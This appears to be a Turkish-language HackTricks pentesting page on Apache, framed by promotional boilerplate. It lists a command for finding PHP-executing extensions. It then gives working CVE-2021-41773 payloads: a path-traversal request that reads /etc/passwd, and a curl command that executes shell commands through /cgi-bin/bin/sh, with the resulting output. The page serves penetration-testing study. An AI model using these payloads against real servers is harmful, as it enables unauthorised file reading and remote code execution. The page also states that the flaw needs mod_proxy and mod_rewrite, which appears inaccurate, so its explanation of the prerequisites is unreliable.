4 KiB
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek isterseniz veya HackTricks'i PDF olarak indirmek isterseniz ABONELİK PLANLARINA göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.
Yürütülebilir PHP uzantıları
Apache sunucusunun hangi uzantıları yürüttüğünü kontrol edin. Bunları aramak için aşağıdaki komutu çalıştırabilirsiniz:
grep -R -B1 "httpd-php" /etc/apache2
Ayrıca, bu yapılandırmayı bulabileceğiniz bazı yerler şunlardır:
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
CVE-2021-41773
Bu, Apache HTTP Sunucusu'nun 2.4.49 sürümünde bulunan bir güvenlik açığıdır. Bu açık, hedef sunucuda bir dosya okuma saldırısına izin verir.
Açık Detayları
Bu güvenlik açığı, hedef sunucuda mod_proxy
ve mod_rewrite
modüllerinin etkin olduğu durumlarda ortaya çıkar. Saldırgan, hedef sunucuya özel olarak oluşturulmuş bir HTTP isteği göndererek, sunucunun dosya sistemine erişim sağlayabilir.
Saldırı Senaryosu
Saldırgan, hedef sunucuya aşağıdaki gibi bir HTTP isteği göndererek saldırıyı gerçekleştirebilir:
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: example.com
Bu istek, sunucunun /etc/passwd
dosyasını okumasına neden olur. Saldırgan, bu şekilde hassas bilgilere erişebilir.
Önlem
Bu güvenlik açığından korunmak için Apache HTTP Sunucusu'nun en son sürümüne güncellenmelidir. Ayrıca, mod_proxy
ve mod_rewrite
modüllerinin gereksiz yere etkinleştirilmemesi önemlidir.
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek isterseniz veya HackTricks'i PDF olarak indirmek isterseniz ABONELİK PLANLARINA göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.